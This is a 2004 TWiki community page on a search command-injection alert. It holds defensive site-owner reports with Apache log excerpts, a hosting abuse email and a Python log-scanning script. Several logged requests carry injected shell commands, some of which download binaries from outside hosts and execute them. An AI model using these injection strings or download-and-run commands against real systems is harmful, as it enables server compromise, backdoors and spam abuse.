
Have you been affected by SecurityAlertExecuteCommandsWithSearch?

BUT if site owners correlate attacks, the attackers might get their IP connection shut off before they actually find a vulnerable TWiki. This needs something like a wiki to be effective.

So sharing abuse reports could be helpful.

How to check if someone has attempted to attack your site

  • It seems that attempts on my dreamhost servers all used BEGIN in the string, which is visible in the Apache error.log file (or the equivalent on other web servers). If you've seen other patterns please add them.

Dreamhost

grep __BEGIN__ ~/logs/*/http/access.log*

Add your hosting provider here
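The grep above keys on the __BEGIN__ marker the attack string carries. As an added example (not code from this page or from the TWiki project), the Python below runs the same check over both Apache access-log lines (with or without the "file:" prefix grep prints) and TWiki's own pipe-delimited data/log.txt rows, URL-decodes the request, pulls out the injected command between the quote breakout and the sed pipe, and groups the hits by source IP so they can go into an abuse report. The sample lines, the addresses 198.51.100.7, 192.0.2.x and 203.0.113.9, and the host example.invalid are constructed placeholders, not real attackers.

```python
"""Flag TWiki search command-injection attempts in Apache and TWiki logs.

Added example, not code from the page or the TWiki project. It assumes
Apache "combined" log lines (optionally prefixed with "path:" as grep
prints them) and TWiki's pipe-delimited data/log.txt rows. The sample
lines are constructed; 198.51.100.7, 192.0.2.x, 203.0.113.9 and
example.invalid are documentation placeholders.
"""
import re
from urllib.parse import unquote_plus

# Apache combined log line, with the optional "file:" prefix grep adds.
APACHE_RE = re.compile(
    r'^(?:(?P<file>[^\s:]+):)?(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: (?P<proto>\S+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Two indicators: the __BEGIN__ marker the page already greps for, and the
# quote breakout "'; (" that ends the single-quoted search term and opens a
# subshell; the breakout is what turns the search string into a command.
MARKER = "__BEGIN__"
BREAKOUT_RE = re.compile(r"'\s*;\s*\((?P<cmd>.*?)\)\s*\|")


def extract_injection(text):
    """Return the injected command from URL-decoded text, '' if only the
    marker is present, or None when the text looks like an ordinary search."""
    m = BREAKOUT_RE.search(text)
    if m:
        return m.group("cmd").strip()
    if MARKER in text:
        return ""
    return None


def parse_apache(line):
    """Apache combined log line -> hit dict, or None if clean/unparseable."""
    m = APACHE_RE.match(line)
    if not m:
        return None
    cmd = extract_injection(unquote_plus(m.group("target")))
    if cmd is None:
        return None
    return {"source": "apache", "ip": m.group("host"), "when": m.group("ts"),
            "status": int(m.group("status")), "command": cmd}


def parse_twiki(line):
    """TWiki data/log.txt row -> hit dict, or None if clean/unparseable.
    Row layout is | date | user | action | webs | search text | ip |, but the
    injected text itself contains " | sed ", so the middle fields are
    re-joined before inspection."""
    fields = line.strip().strip("|").strip().split(" | ")
    if len(fields) < 6:
        return None
    cmd = extract_injection(" | ".join(fields[4:-1]))
    if cmd is None:
        return None
    return {"source": "twiki", "ip": fields[-1], "when": fields[0],
            "status": None, "command": cmd}


def scan(lines):
    """Return a hit dict for every log line carrying the injection."""
    hits = []
    for line in lines:
        line = line.rstrip("\n")
        if not line.strip():
            continue
        hit = parse_twiki(line) if line.lstrip().startswith("|") else parse_apache(line)
        if hit:
            hits.append(hit)
    return hits


def by_source_ip(hits):
    """Group injected commands per source IP, the unit an abuse report names."""
    report = {}
    for h in hits:
        report.setdefault(h["ip"], []).append(h["command"])
    return report


# Constructed sample: two probes from one address, one benign search, one
# TWiki log row with the same pattern, one ordinary TWiki log row.
SAMPLE_LINES = [
    '/var/log/apache/access.log.1:198.51.100.7 - - [20/Nov/2004:05:17:53 -0800] "GET /twiki/bin/search/TWiki/?scope=text&search=doesnotexist1%27%3B+%28uname+-a%3Bid%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 6638 "-" "Mozilla/3.0 (compatible; Indy Library)"',
    '203.0.113.9 - - [20/Nov/2004:06:00:00 -0800] "GET /twiki/bin/search/Main/?scope=text&search=marker HTTP/1.1" 200 1200 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [20/Nov/2004:05:18:10 -0800] "GET /twiki/bin/view/Sandbox/WebSearch?search=doesnotexist1%27%3B+%28cd+%2Ftmp%3Bwget+example.invalid%2Fpayload%3Bchmod+777+payload%3B.%2Fpayload%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2&scope=text HTTP/1.1" 200 11908 "-" "Mozilla/4.0"',
    r"| 18 Nov 2004 - 15:29 | Main.guest | search | Main Sandbox TWiki | doesnotexist1'; (uname -a; id) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 192.0.2.44 |",
    "| 18 Nov 2004 - 15:30 | Main.guest | search | Main | backup policy | 192.0.2.45 |",
]

if __name__ == "__main__":
    for ip, cmds in by_source_ip(scan(SAMPLE_LINES)).items():
        print(ip)
        for c in cmds:
            print("    ", c)
```

The HTTP status in each hit is worth keeping: a 404 or 500 (as in several reports on this page) usually means the search script was not reached or the shell command failed, while a 200 on a host that was still unpatched at that time says nothing about whether the command ran and calls for the host-side checks the later reports describe.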

Attempt Reports

MartinCleaver

/home/mrjc/logs/cleaver.org/http/access.log.0:213.140.17.96 - - [20/Nov/2004:05:17:53 -0800] "GET /view/Cvswebclient/WebHome?CGISESSID=f057354fbafe9d1b20840672070ac231&CGISESSID=f057354fbafe9d1b20840672070ac231&topic=doesnotexist1%27%3B+%28uname+-a%3B+id%3Buptime%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 652 "http://cleaver.org/twiki/bin/view/Cvswebclient/WebHome" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux)"
/home/mrjc/logs/cleaver.org/http/access.log.0:213.140.17.96 - - [20/Nov/2004:05:17:54 -0800] "GET /oops/doesnotexist1%20(uname%20-a%20iduptime)%20%20sed%20s/\\(.\\)/__BEGIN__\\1__END__.txt/%20fgrep%20-i%20-l%20--%20doesnotexist2?template=oopsnoweb&param1=ERROR%20doesnotexist1%20(uname%20-a%20iduptime)%20sed%20s/%5C(.%5C)/__BEGIN__%5C1__END__.txt.%20fgrep%20-i%20-l%20--%20doesnotexist2%20Missing%20Web HTTP/1.1" 200 726 "http://cleaver.org/twiki/bin/view/Cvswebclient/WebHome" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux)"
/home/mrjc/logs/cleaver.org/http/access.log.0:201.8.137.163 - - [20/Nov/2004:14:42:28 -0800] "GET /twiki/bin/search/TWiki/?scope=text&search=doesnotexist1%27%3B+%28uname+-a%3Bid%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 6638 "-" "Mozilla/3.0 (compatible; Indy Library)"
/home/mrjc/logs/cleaver.org/http/access.log.0:200.158.8.182 - - [20/Nov/2004:16:23:46 -0800] "GET /twiki/bin/search/TWiki/?scope=text&search=doesnotexist1%27%3B+%28uname+-a%3Bid%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 6638 "-" "Mozilla/3.0 (compatible; Indy Library)"
/home/mrjc/logs/cleaver.org/http/access.log.0:200.158.8.182 - - [20/Nov/2004:16:44:50 -0800] "GET /twiki/bin/search//?scope=text&search=doesnotexist1%27%3B+%28id%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.0" 200 3581 "-" "-"
/home/mrjc/logs/cleaver.org/http/access.log.2004-11-20:213.140.17.96 - - [20/Nov/2004:05:17:53 -0800] "GET /view/Cvswebclient/WebHome?CGISESSID=f057354fbafe9d1b20840672070ac231&CGISESSID=f057354fbafe9d1b20840672070ac231&topic=doesnotexist1%27%3B+%28uname+-a%3B+id%3Buptime%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 652 "http://cleaver.org/twiki/bin/view/Cvswebclient/WebHome" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux)"
/home/mrjc/logs/cleaver.org/http/access.log.2004-11-20:213.140.17.96 - - [20/Nov/2004:05:17:54 -0800] "GET /oops/doesnotexist1%20(uname%20-a%20iduptime)%20%20sed%20s/\\(.\\)/__BEGIN__\\1__END__.txt/%20fgrep%20-i%20-l%20--%20doesnotexist2?template=oopsnoweb&param1=ERROR%20doesnotexist1%20(uname%20-a%20iduptime)%20sed%20s/%5C(.%5C)/__BEGIN__%5C1__END__.txt.%20fgrep%20-i%20-l%20--%20doesnotexist2%20Missing%20Web HTTP/1.1" 200 726 "http://cleaver.org/twiki/bin/view/Cvswebclient/WebHome" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux)"
/home/mrjc/logs/cleaver.org/http/access.log.2004-11-20:201.8.137.163 - - [20/Nov/2004:14:42:28 -0800] "GET /twiki/bin/search/TWiki/?scope=text&search=doesnotexist1%27%3B+%28uname+-a%3Bid%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 6638 "-" "Mozilla/3.0 (compatible; Indy Library)"
/home/mrjc/logs/cleaver.org/http/access.log.2004-11-20:200.158.8.182 - - [20/Nov/2004:16:23:46 -0800] "GET /twiki/bin/search/TWiki/?scope=text&search=doesnotexist1%27%3B+%28uname+-a%3Bid%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 6638 "-" "Mozilla/3.0 (compatible; Indy Library)"
/home/mrjc/logs/cleaver.org/http/access.log.2004-11-20:200.158.8.182 - - [20/Nov/2004:16:44:50 -0800] "GET /twiki/bin/search//?scope=text&search=doesnotexist1%27%3B+%28id%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.0" 200 3581 "-" "-"
/home/mrjc/logs/conceptmapping.net/http/access.log.0:201.8.137.163 - - [20/Nov/2004:13:56:14 -0800] "GET /twiki/bin/search/TWiki/?scope=text&search=doesnotexist1%27%3B+%28uname+-a%3Bid%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 404 - "-" "Mozilla/3.0 (compatible; Indy Library)"
/home/mrjc/logs/conceptmapping.net/http/access.log.0:201.8.137.163 - - [20/Nov/2004:14:42:39 -0800] "GET /twiki/bin/search/TWiki/?scope=text&search=doesnotexist1%27%3B+%28uname+-a%3Bid%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 404 - "-" "Mozilla/3.0 (compatible; Indy Library)"
/home/mrjc/logs/conceptmapping.net/http/access.log.2004-11-19:200.165.224.206 - - [19/Nov/2004:18:54:08 -0800] "GET /twiki/bin/search/TWiki/?scope=text&search=doesnotexist1%27%3B+%28uname+-a%3Bid%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 404 - "-" "Mozilla/3.0 (compatible; Indy Library)"
/home/mrjc/logs/conceptmapping.net/http/access.log.2004-11-20:201.8.137.163 - - [20/Nov/2004:13:56:14 -0800] "GET /twiki/bin/search/TWiki/?scope=text&search=doesnotexist1%27%3B+%28uname+-a%3Bid%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 404 - "-" "Mozilla/3.0 (compatible; Indy Library)"
/home/mrjc/logs/conceptmapping.net/http/access.log.2004-11-20:201.8.137.163 - - [20/Nov/2004:14:42:39 -0800] "GET /twiki/bin/search/TWiki/?scope=text&search=doesnotexist1%27%3B+%28uname+-a%3Bid%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 404 - "-" "Mozilla/3.0 (compatible; Indy Library)"
/home/mrjc/logs/mbawiki.com/http/access.log.2004-11-19:200.232.210.221 - - [19/Nov/2004:17:17:41 -0800] "GET /twiki/bin/search/ManagerialEnvironment/?scope=text&search=doesnotexist1%27%3B+%28id%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.0" 404 - "-" "-"

Damage done

  • One account affected - looks like I missed it when patching - Dreamhost sent this email to me:
From: DreamHost Customer Support Team 
Date: Sun, 21 Nov 2004 10:20:06 -0800 (PST)
Subject: [mrjcleaver 3487179] Email System Abuse
Hello,

An excessive amount of email was sent from your 'redbourn' user account
this morning.  We cannot allow that much email to be sent from a shared
hosting account as it monopolizes the available resources.  In addition,
you were running several persistent processes including an httpd server.
We don't allow that either.

It looks like your account was cracked and used by malicious people to
send out a bunch of spam email.  The crack came in through your Twiki
install.

Here is one of the GET commands that was used:

GET /twiki/pub/Plugins/KoalaSkin/sitemap.gif HTTP/1.1" 200 96
"http://redbourn.org.uk/twiki/bin/search/TWiki/?scope=text&web=on&search=
doesnotexist1%27%3B+%28cd+%2Ftmp%3Bwget+www.wget.home.ro%2Fhttpd%3Bchmod+
777+x++httpd%3B%2Ftmp%2Fhttpd%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN_
_%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2

Ensure that you are using the most up to date version of the Twiki
software.  If not, we will not be able to allow you to continue running
it on our server.  Let us know if you have any questions.

Thanks!
Dallas

MS

201.8.137.163 - - [20/Nov/2004:23:19:32 +0000] "GET /twiki/bin/search/TWiki/?scope=text&search=doesnotexist1%27%3B+%28uname+-a%3Bid%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 404 229 " -" "Mozilla/3.0 (compatible; Indy Library)"

Damage done

  • None: No code running

-- MartinCleaver - 21 Nov 2004

Main.ArthurClemens

I also run TWiki from a Dreamhost site. I disabled search now, but I still get these queries:

running search in Main:

200.162.230.113 - - [21/Nov/2004:04:02:53 -0800] "GET /cgi-bin/twiki/search/Main/?scope=text&search=
doesnotexist1%27%3B+%28cd+%2Fvar%2Ftmp%3Bwget+http%3A%2F%2Fsixth.ucsd.edu%2Fks%2Fbd%2Fr0nin%3Bchmod+
777+r0nin%3B.%2Fr0nin%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+
-l+--+%27doesnotexist2 HTTP/1.1" 200 - "http://www.visiblearea.com/cgi-bin/twiki/view/Main/WebSearch"
 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"

from SearchResult:

80.116.136.64 - - [21/Nov/2004:09:02:12 -0800] "GET /twiki/bin/search/Main/SearchResult?search=doesnotexist1'%3B+(uname%20-a)+%7C+sed+'s%2F%5C(.*%5C)%2F__BEGIN__%5C1__END__.txt%2F'%3B+fgrep
+-i+-l+--+'doesnotexist2 HTTP/1.0" 404 - "-" "Links (0.99; Linux 2.7.1-fake i686; 128x48)"

from a formatted search:

200.161.250.245 - - [21/Nov/2004:11:13:22 -0800] "GET x/?scope=topic&regex=on&search=%5Ey?scope=text&search=doesnotexist1%27%3B+%28uname+-a%3Bid%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27
doesnotexist2 HTTP/1.0" 400 466 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

Damage done

Dreamhost support mailed me: They installed stuff into /tmp and /var/tmp mostly [...] Basically, they installed a backdoor login program, some exploit attempts, etc.

-- ArthurClemens - 21 Nov 2004

Arthur - what and where was the PHPshell?

The wasters left this in one of the files "Simiens Crew" - Google:%22Simiens+Crew%22

-- MartinCleaver - 21 Nov 2004

It was in the cgi-bin folder. But I removed it, so I don't have details.

-- ArthurClemens - 21 Nov 2004

KennethLavrsen

My TWiki is run on my home server.

I patched the TWiki the same morning the warning was posted by PeterThoeny.

I have so far seen 7 attempts.

These are the access log entries:

148.244.150.58 - - [14/Nov/2004:20:01:53 +0100] "GET /twiki/bin/view/TWiki/WebHome?raw=on HTTP/1.0" 200 15491 "http://www.google.it/search?hl=it&q=twiki+%2FWebHome+site%3A.dk&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
148.244.150.58 - - [14/Nov/2004:20:01:55 +0100] "GET /twiki/pub/TWiki/PatternSkin/layout.css HTTP/1.0" 200 1823 "http://www.lavrsen.dk/twiki/bin/view/TWiki/WebHome?raw=on" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
148.244.150.58 - - [14/Nov/2004:20:01:55 +0100] "GET /twiki/pub/TWiki/PatternSkin/style.css HTTP/1.0" 200 26609 "http://www.lavrsen.dk/twiki/bin/view/TWiki/WebHome?raw=on" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
148.244.150.58 - - [14/Nov/2004:20:01:57 +0100] "GET /twiki/pub/TWiki/TWikiLogos/kennethwiki-trans.gif HTTP/1.0" 200 1478 "http://www.lavrsen.dk/twiki/bin/view/TWiki/WebHome?raw=on" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
148.244.150.58 - - [14/Nov/2004:20:02:03 +0100] "GET /twiki/bin/view/TWiki/WebHome?raw=on HTTP/1.0" 200 13478 "http://www.google.it/search?hl=it&q=twiki+%2FWebHome+site%3A.dk&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
148.244.150.58 - - [14/Nov/2004:20:02:07 +0100] "GET /twiki/bin/view/TWiki/WebHome HTTP/1.0" 200 30515 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
148.244.150.58 - - [14/Nov/2004:20:02:10 +0100] "GET /twiki/pub/TWiki/TWikiLogos/twikiRobot131x64.gif HTTP/1.0" 200 7218 "http://www.lavrsen.dk/twiki/bin/view/TWiki/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
148.244.150.58 - - [14/Nov/2004:20:02:10 +0100] "GET /twiki/pub/TWiki/PatternSkin/i_arrow_down.gif HTTP/1.0" 200 56 "http://www.lavrsen.dk/twiki/bin/view/TWiki/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
148.244.150.58 - - [14/Nov/2004:20:02:10 +0100] "GET /twiki/pub/TWiki/SmiliesPlugin/smile.gif HTTP/1.0" 200 93 "http://www.lavrsen.dk/twiki/bin/view/TWiki/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
148.244.150.58 - - [14/Nov/2004:20:02:10 +0100] "GET /twiki/pub/TWiki/SmiliesPlugin/cool.gif HTTP/1.0" 200 124 "http://www.lavrsen.dk/twiki/bin/view/TWiki/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
148.244.150.58 - - [14/Nov/2004:20:02:10 +0100] "GET /twiki/pub/TWiki/TWikiDocGraphics/tip.gif HTTP/1.0" 200 123 "http://www.lavrsen.dk/twiki/bin/view/TWiki/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
148.244.150.58 - - [14/Nov/2004:20:02:11 +0100] "GET /twiki/pub/TWiki/TWikiDocGraphics/searchtopic.gif HTTP/1.0" 200 192 "http://www.lavrsen.dk/twiki/bin/view/TWiki/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
148.244.150.58 - - [14/Nov/2004:20:02:11 +0100] "GET /twiki/pub/TWiki/TWikiDocGraphics/home.gif HTTP/1.0" 200 172 "http://www.lavrsen.dk/twiki/bin/view/TWiki/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
148.244.150.58 - - [14/Nov/2004:20:02:11 +0100] "GET /twiki/pub/TWiki/TWikiDocGraphics/notify.gif HTTP/1.0" 200 183 "http://www.lavrsen.dk/twiki/bin/view/TWiki/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
148.244.150.58 - - [14/Nov/2004:20:02:11 +0100] "GET /twiki/pub/TWiki/TWikiDocGraphics/recentchanges.gif HTTP/1.0" 200 945 "http://www.lavrsen.dk/twiki/bin/view/TWiki/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
148.244.150.58 - - [14/Nov/2004:20:02:11 +0100] "GET /twiki/pub/TWiki/TWikiLogos/twikiRobot88x31.gif HTTP/1.0" 200 3501 "http://www.lavrsen.dk/twiki/bin/view/TWiki/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
148.244.150.58 - - [14/Nov/2004:20:02:14 +0100] "GET /twiki/bin/search/TWiki/SearchResult?search=doesnotexist1%27%3B+%28uname+-a%3B+id%2Cuptime%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.0" 


200.203.166.61 - - [18/Nov/2004:23:16:56 +0100] "GET /twiki/pub/TWiki/PatternSkin/layout.css HTTP/1.1" 200 1823 "http://www.lavrsen.dk/twiki/bin/rdiff/Sandbox/WebSearch" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
200.203.166.61 - - [18/Nov/2004:23:16:54 +0100] "GET /twiki/bin/rdiff/Sandbox/WebSearch HTTP/1.1" 200 58390 "http://www.google.com.br/search?q=allinurl%3Atwiki*websearch+site%3Adk&hl=pt-BR" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
200.203.166.61 - - [18/Nov/2004:23:16:57 +0100] "GET /twiki/pub/TWiki/PatternSkin/style.css HTTP/1.1" 200 26609 "http://www.lavrsen.dk/twiki/bin/rdiff/Sandbox/WebSearch" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
200.203.166.61 - - [18/Nov/2004:23:17:40 +0100] "GET /twiki/bin/view/Sandbox/WebSearch?CGISESSID=8c27b0af17dfeff1a71a6f8f76e558ba&search=doesnotexist1%27%3B+%28+cd+%2Fvar%2Ftmp%3Bwget+http%3A%2F%2Fwww.zona-de-juegos.com%2Fimages%2Fpowered%2Fcommandt%2Fxpl%2F44464%3Bchmod%2520777%252044464%3B.%2F44464+%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2&scope=text HTTP/1.1" 200 11908 "http://www.lavrsen.dk/twiki/bin/rdiff/Sandbox/WebSearch" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
200.203.166.61 - - [18/Nov/2004:23:17:42 +0100] "GET /twiki/pub/TWiki/TWikiLogos/kennethwiki-trans.gif HTTP/1.1" 200 1478 "http://www.lavrsen.dk/twiki/bin/view/Sandbox/WebSearch?CGISESSID=8c27b0af17dfeff1a71a6f8f76e558ba&search=doesnotexist1%27%3B+%28+cd+%2Fvar%2Ftmp%3Bwget+http%3A%2F%2Fwww.zona-de-juegos.com%2Fimages%2Fpowered%2Fcommandt%2Fxpl%2F44464%3Bchmod%2520777%252044464%3B.%2F44464+%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2&scope=text" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 


61.149.37.106 - - [19/Nov/2004:18:19:16 +0100] "GET /twiki/pub/TWiki/PatternSkin/layout.css HTTP/1.1" 200 1823 "http://www.lavrsen.dk/twiki/bin/view/Motion/WebHome" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6) Gecko/20040113"
61.149.37.106 - - [19/Nov/2004:18:19:10 +0100] "GET /twiki/bin/view/Motion/WebHome HTTP/1.1" 200 24235 "http://www.google.cl/search?q=allinurl%3A+twiki+site%3A.dk&btnG=B%C3%BAsqueda&hl=es&newwindow=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6) Gecko/20040113"
61.149.37.106 - - [19/Nov/2004:18:19:19 +0100] "GET /twiki/pub/TWiki/PatternSkin/style.css HTTP/1.1" 200 26609 "http://www.lavrsen.dk/twiki/bin/view/Motion/WebHome" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6) Gecko/20040113"
61.149.37.106 - - [19/Nov/2004:18:19:26 +0100] "GET /twiki/pub/TWiki/TWikiLogos/motion-trans.gif HTTP/1.1" 200 1948 "http://www.lavrsen.dk/twiki/bin/view/Motion/WebHome" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6) Gecko/20040113"
61.149.37.106 - - [19/Nov/2004:18:19:35 +0100] "GET /twiki/bin/view/Motion/WebSearch?CGISESSID=d8ae5e63d290eac8626291c4d7556991&CGISESSID=d8ae5e63d290eac8626291c4d7556991 HTTP/1.1" 200 12023 "http://www.lavrsen.dk/twiki/bin/view/Motion/WebHome" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6) Gecko/20040113"
61.149.37.106 - - [19/Nov/2004:18:20:28 +0100] "GET /twiki/bin/view/Motion/WebSearch?search=doesnotexist1%27%3B+%28uname+-a%3B+id%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2&scope=text HTTP/1.1" 200 12175 "http://www.lavrsen.dk/twiki/bin/view/Motion/WebSearch?CGISESSID=d8ae5e63d290eac8626291c4d7556991&CGISESSID=d8ae5e63d290eac8626291c4d7556991" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6) Gecko/20040113" 


202.95.134.214 - - [19/Nov/2004:22:36:24 +0100] "GET /twiki/bin/view/Motion/WebHome HTTP/1.1" 200 24235 "http://www.google.com/search?q=allinurl%3Atwiki%2Fbin%2F&hl=en&lr=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
202.95.134.214 - - [19/Nov/2004:22:36:31 +0100] "GET /twiki/pub/TWiki/PatternSkin/style.css HTTP/1.1" 200 26609 "http://www.lavrsen.dk/twiki/bin/view/Motion/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
202.95.134.214 - - [19/Nov/2004:22:36:36 +0100] "GET /twiki/pub/TWiki/PatternSkin/layout.css HTTP/1.1" 200 1823 "http://www.lavrsen.dk/twiki/bin/view/Motion/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
202.95.134.214 - - [19/Nov/2004:22:36:39 +0100] "GET /twiki/pub/TWiki/TWikiLogos/motion-trans.gif HTTP/1.1" 200 1948 "http://www.lavrsen.dk/twiki/bin/view/Motion/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
202.95.134.214 - - [19/Nov/2004:22:37:10 +0100] "GET /twiki/bin/search/Motion/SearchResult?CGISESSID=122de48b9cbd6451bcd06d70a45b0a86&search=doesnotexist1%27%3B+%28uname+-a%3B+id%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 5158 "http://www.lavrsen.dk/twiki/bin/view/Motion/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
202.95.134.214 - - [19/Nov/2004:22:37:14 +0100] "GET /twiki/pub/TWiki/PatternSkin/style.css HTTP/1.1" 304 - "http://www.lavrsen.dk/twiki/bin/search/Motion/SearchResult?CGISESSID=122de48b9cbd6451bcd06d70a45b0a86&search=doesnotexist1%27%3B+%28uname+-a%3B+id%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" 


201.9.37.167 - - [20/Nov/2004:17:26:19 +0100] "GET /twiki/bin/view/Sandbox/WebSearch HTTP/1.1" 200 17062 "http://www.google.com.br/search?hl=pt-BR&q=allinurl%3Atwiki*websearch+.dk&btnG=Pesquisar&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.9.37.167 - - [20/Nov/2004:17:26:22 +0100] "GET /twiki/pub/TWiki/PatternSkin/layout.css HTTP/1.1" 200 1823 "http://www.lavrsen.dk/twiki/bin/view/Sandbox/WebSearch" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
